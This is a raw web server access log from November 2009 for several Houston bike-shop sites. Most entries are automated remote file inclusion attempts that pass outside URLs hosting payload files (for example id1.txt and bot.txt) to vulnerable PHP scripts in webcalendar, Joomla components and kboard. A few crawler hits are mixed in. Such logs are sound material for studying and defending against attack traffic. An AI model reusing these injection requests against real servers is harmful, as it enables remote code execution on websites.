91.121.28.22 - - [10/Nov/2009:22:59:47 -0800] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.28.22 - - [10/Nov/2009:22:59:47 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.232.167.73 - - [10/Nov/2009:23:02:57 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.232.167.73 - - [10/Nov/2009:23:02:58 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.232.167.73 - - [10/Nov/2009:23:02:58 -0800] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.232.167.73 - - [10/Nov/2009:23:02:58 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.247.200.12 - - [10/Nov/2009:23:05:33 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.247.200.12 - - [10/Nov/2009:23:05:33 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.247.200.12 - - [10/Nov/2009:23:05:33 -0800] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.247.200.12 - - [10/Nov/2009:23:05:33 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [10/Nov/2009:23:10:56 -0800] "GET /logs/access.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
157.100.230.82 - - [10/Nov/2009:23:14:26 -0800] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
157.100.230.82 - - [10/Nov/2009:23:14:26 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
157.100.230.82 - - [10/Nov/2009:23:14:26 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
157.100.230.82 - - [10/Nov/2009:23:14:26 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.232.167.73 - - [10/Nov/2009:23:16:09 -0800] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.232.167.73 - - [10/Nov/2009:23:16:09 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.74.222 - - [10/Nov/2009:23:17:51 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.74.222 - - [10/Nov/2009:23:17:51 -0800] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.181.60 - - [10/Nov/2009:23:18:01 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.spotmerkezi.com/cache/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.181.60 - - [10/Nov/2009:23:18:01 -0800] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://www.spotmerkezi.com/cache/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.103.31.24 - - [10/Nov/2009:23:21:08 -0800] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
157.100.230.82 - - [10/Nov/2009:23:21:51 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
157.100.230.82 - - [10/Nov/2009:23:21:51 -0800] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.28.22 - - [10/Nov/2009:23:23:52 -0800] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.28.22 - - [10/Nov/2009:23:23:52 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.181.94.230 - - [10/Nov/2009:23:26:31 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "bicyclestoreshouston.com"
211.40.68.132 - - [10/Nov/2009:23:28:54 -0800] "GET /webcalendar//tools/send_reminders.php?noSet=0&includedir=http://tommymartin.info//project/projects/bot.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "houstonbikeshop.com"
211.40.68.132 - - [10/Nov/2009:23:28:54 -0800] "GET /logs//webcalendar//tools/send_reminders.php?noSet=0&includedir=http://tommymartin.info//project/projects/bot.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "houstonbikeshop.com"
67.195.110.176 - - [10/Nov/2009:23:30:21 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.svbikes.com"
67.195.110.176 - - [10/Nov/2009:23:30:22 -0800] "GET /tmp/?N=D HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.svbikes.com"
62.141.47.10 - - [10/Nov/2009:23:45:34 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.141.47.10 - - [10/Nov/2009:23:45:34 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.141.47.10 - - [10/Nov/2009:23:45:37 -0800] "GET /translations/German.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
114.4.8.14 - - [10/Nov/2009:23:48:29 -0800] "GET /translations///?noSet=0&includedir=http://n34.biz/id1.txt??? HTTP/1.1" 200 3861 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
114.4.8.14 - - [10/Nov/2009:23:48:29 -0800] "GET //?noSet=0&includedir=http://n34.biz/id1.txt??? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
114.4.8.14 - - [10/Nov/2009:23:48:31 -0800] "GET /translations/Spanish.txt///?noSet=0&includedir=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
114.4.8.14 - - [10/Nov/2009:23:48:34 -0800] "GET /translations///?noSet=0&includedir=http://n34.biz/id1.txt??? HTTP/1.1" 200 3861 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
114.4.8.14 - - [10/Nov/2009:23:48:34 -0800] "GET //?noSet=0&includedir=http://n34.biz/id1.txt??? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
114.4.8.14 - - [10/Nov/2009:23:48:34 -0800] "GET /translations/Spanish.txt///?noSet=0&includedir=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
62.141.47.10 - - [10/Nov/2009:23:54:03 -0800] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
114.4.8.14 - - [10/Nov/2009:23:57:26 -0800] "GET /translations/Spanish.txt%20%20///?noSet=0&includedir=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
114.4.8.14 - - [10/Nov/2009:23:57:29 -0800] "GET /translations/Spanish.txt%20%20///?noSet=0&includedir=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
81.19.66.38 - - [11/Nov/2009:00:12:02 -0800] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Nov/2009:00:12:02 -0800] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Nov/2009:00:12:03 -0800] "GET /bullitinboard/viewtopic.php?p=2005 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Nov/2009:00:12:03 -0800] "GET /bullitinboard/viewtopic.php?p=2036 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Nov/2009:00:12:04 -0800] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
124.115.6.17 - - [11/Nov/2009:00:16:24 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "houstonbikeshop.com"
67.195.111.181 - - [11/Nov/2009:00:25:54 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.houstonbikeshop.com"
67.195.111.181 - - [11/Nov/2009:00:26:01 -0800] "GET /logs/access_090310.log HTTP/1.0" 200 6047120 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.houstonbikeshop.com"
220.181.94.230 - - [11/Nov/2009:00:34:11 -0800] "GET /bullitinboard/viewtopic.php?p=15678 HTTP/1.1" 200 533 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "bicyclestoreshouston.com"
95.215.1.15 - - [11/Nov/2009:00:52:55 -0800] "GET /bullitinboard/viewtopic.php?p=2485 HTTP/1.0" 200 517 "http://houstonbikeshop.com/bullitinboard/viewtopic.php?p=2485" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 3.1)" "houstonbikeshop.com"
95.215.1.15 - - [11/Nov/2009:00:52:55 -0800] "GET / HTTP/1.0" 200 1748 "http://houstonbikeshop.com/" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 3.1)" "houstonbikeshop.com"
95.215.1.15 - - [11/Nov/2009:00:52:56 -0800] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://houstonbikeshop.com/bullitinboard/" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 3.1)" "houstonbikeshop.com"
41.220.75.16 - - [11/Nov/2009:00:54:42 -0800] "GET /logs/access.log HTTP/1.1" 200 210767 "http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=all&q=&itag=crv&l=en&ics=utf-8&cs=iso88591&wf%5Bn%5D=3&wf%5B0%5D%5Br%5D=%2B&wf%5B0%5D%5Bq%5D=kim+%40yahoo.com&wf%5B0%5D%5Bw%5D=&wf%5B1%5D%5Br%5D=%2B&wf%5B1%5D%5Bq%5D=2009&wf%5B1%5D%5Bw%5D=&wf%5B2%5D%5Br%5D=-&wf%5B2%5D%5Bq%5D=scam&wf%5B2%5D%5Bw%5D=&dincl=&dexcl=&geo=ai&doctype=text&dfr%5Bd%5D=1&dfr%5Bm%5D=1&dfr%5By%5D=1980&dto%5Bu%5D=on&dto%5Bd%5D=11&dto%5Bm%5D=11&dto%5By%5D=2009&hits=10" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5" "houstonbikeshop.com"
41.220.75.3 - - [11/Nov/2009:00:55:51 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5" "houstonbikeshop.com"
41.220.75.16 - - [11/Nov/2009:00:55:59 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5" "houstonbikeshop.com"
211.115.213.162 - - [11/Nov/2009:01:07:21 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.115.213.162 - - [11/Nov/2009:01:07:21 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.115.213.162 - - [11/Nov/2009:01:07:21 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.115.213.162 - - [11/Nov/2009:01:11:47 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.115.213.162 - - [11/Nov/2009:01:11:47 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.115.213.162 - - [11/Nov/2009:01:11:47 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
89.253.247.177 - - [11/Nov/2009:01:22:57 -0800] "GET /logs/access.log//snippets/reflect/snippet.reflect.php?reflect_base=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
89.253.247.177 - - [11/Nov/2009:01:22:57 -0800] "GET /snippets/reflect/snippet.reflect.php?reflect_base=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
89.253.247.177 - - [11/Nov/2009:01:22:57 -0800] "GET /logs//snippets/reflect/snippet.reflect.php?reflect_base=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
89.253.247.177 - - [11/Nov/2009:01:24:23 -0800] "GET /logs/access.log%20%20//snippets/reflect/snippet.reflect.php?reflect_base=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.181.94.230 - - [11/Nov/2009:02:05:10 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "bicyclestoreshouston.com"
85.214.74.222 - - [11/Nov/2009:02:12:45 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.74.222 - - [11/Nov/2009:02:12:45 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://190.81.28.182/incaware/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.74.222 - - [11/Nov/2009:02:12:47 -0800] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.73.17.7 - - [11/Nov/2009:02:14:24 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.73.17.7 - - [11/Nov/2009:02:14:24 -0800] "GET /logs/access.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.73.17.7 - - [11/Nov/2009:02:14:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.73.17.7 - - [11/Nov/2009:02:14:29 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.73.17.7 - - [11/Nov/2009:02:14:29 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.73.17.7 - - [11/Nov/2009:02:14:29 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.73.17.7 - - [11/Nov/2009:02:14:31 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.73.17.7 - - [11/Nov/2009:02:14:31 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.73.17.7 - - [11/Nov/2009:02:14:31 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.73.17.7 - - [11/Nov/2009:02:15:00 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.73.17.7 - - [11/Nov/2009:02:15:00 -0800] "GET /logs/access.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.73.17.7 - - [11/Nov/2009:02:15:00 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.74.222 - - [11/Nov/2009:02:15:19 -0800] "GET /logs//kboard.php?board=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.74.222 - - [11/Nov/2009:02:15:19 -0800] "GET /kboard.php?board=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.74.222 - - [11/Nov/2009:02:15:20 -0800] "GET /logs/access.log%20%20//kboard.php?board=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.103.31.24 - - [11/Nov/2009:02:15:43 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.103.31.24 - - [11/Nov/2009:02:15:46 -0800] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.103.31.24 - - [11/Nov/2009:02:15:48 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.103.31.24 - - [11/Nov/2009:02:19:40 -0800] "GET /kboard.php?board=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.103.31.24 - - [11/Nov/2009:02:19:44 -0800] "GET /logs//kboard.php?board=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.103.31.24 - - [11/Nov/2009:02:19:46 -0800] "GET /logs/access.log%20%20//kboard.php?board=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
157.100.230.82 - - [11/Nov/2009:02:22:16 -0800] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://190.81.28.182/incaware/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
157.100.230.82 - - [11/Nov/2009:02:22:16 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.74.222 - - [11/Nov/2009:02:24:34 -0800] "GET /logs/access.log//kboard.php?board=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.74.222 - - [11/Nov/2009:02:30:42 -0800] "GET /kboard.php?board=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.74.222 - - [11/Nov/2009:02:30:43 -0800] "GET /logs/access.log%20%20//kboard.php?board=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.74.222 - - [11/Nov/2009:02:30:43 -0800] "GET /logs//kboard.php?board=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.74.222 - - [11/Nov/2009:02:30:43 -0800] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
114.127.246.36 - - [11/Nov/2009:02:31:22 -0800] "GET /bullitinboard/viewtopic.php?t=2208&highlight= HTTP/1.1" 200 533 "http://www.okmedicalplans.com/20454.html" "Mozilla/4.0 (compatible; MSIE 5.0; YANDEX)" "www.svbikes.com"
157.100.230.82 - - [11/Nov/2009:02:31:36 -0800] "GET /logs/access.log//kboard.php?board=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
157.100.230.82 - - [11/Nov/2009:02:31:37 -0800] "GET /kboard.php?board=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
157.100.230.82 - - [11/Nov/2009:02:31:37 -0800] "GET /logs//kboard.php?board=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
157.100.230.82 - - [11/Nov/2009:02:31:52 -0800] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.103.31.24 - - [11/Nov/2009:02:40:38 -0800] "GET /logs/access.log//kboard.php?board=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
89.149.244.89 - - [11/Nov/2009:02:47:33 -0800] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; KKman2.0)" "www.svbikes.com"
89.149.244.89 - - [11/Nov/2009:02:47:33 -0800] "GET / HTTP/1.0" 200 1748 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; KKman2.0)" "www.svbikes.com"
89.149.244.89 - - [11/Nov/2009:02:47:34 -0800] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; KKman2.0)" "www.svbikes.com"
62.103.31.24 - - [11/Nov/2009:02:54:33 -0800] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.186.126.89 - - [11/Nov/2009:03:02:00 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
213.186.126.89 - - [11/Nov/2009:03:02:00 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
213.186.126.89 - - [11/Nov/2009:03:02:00 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
213.186.126.89 - - [11/Nov/2009:03:02:00 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
213.186.126.89 - - [11/Nov/2009:03:02:01 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
